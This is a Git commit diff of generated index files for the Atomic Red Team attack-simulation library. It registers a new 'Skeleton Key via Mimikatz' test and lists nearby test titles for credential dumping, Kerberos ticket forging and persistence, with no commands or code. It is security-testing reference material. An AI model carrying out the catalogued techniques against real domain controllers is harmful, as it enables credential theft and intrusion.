Generated docs from job=generate-docs branch=master [ci skip]

2026-04-16 03:09:01 +00:00
parent 16ddc50340
commit 3d22e294da
30 changed files with 473 additions and 75 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1773-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1774-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -609,6 +609,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Lo
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
+defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
@@ -1425,6 +1426,7 @@ persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Bin
 persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
+persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
@@ -1832,6 +1834,7 @@ credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.pas
 credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
+credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -428,6 +428,7 @@ defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
+defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -1005,6 +1006,7 @@ persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
 persistence,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
+persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
 persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
@@ -1254,6 +1256,7 @@ credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC cal
 credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
 credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
+credential-access,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -134,7 +134,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -354,7 +354,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -519,7 +519,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -135,7 +135,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -357,7 +357,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -522,7 +522,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -785,7 +785,8 @@
 - T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
  - Atomic Test #1: HTML Smuggling Remote Payload [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1903,7 +1904,8 @@
  - Atomic Test #2: Event Monitor Daemon Persistence [macos]
  - Atomic Test #3: Launch Agent - Root Directory [macos]
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
@@ -2509,7 +2511,8 @@
 - [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
  - Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
  - Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -224,7 +224,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -474,7 +474,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -720,7 +720,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -180,7 +180,7 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -421,7 +421,7 @@
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -643,7 +643,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -563,7 +563,8 @@
 - T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
  - Atomic Test #1: HTML Smuggling Remote Payload [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1354,7 +1355,8 @@
 - [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
  - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1766,7 +1768,8 @@
 - [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
  - Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
  - Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
+  - Atomic Test #1: Skeleton Key via Mimikatz [windows]
 - T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -58,7 +58,7 @@
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
-|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |
 |  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
@@ -102,7 +102,7 @@
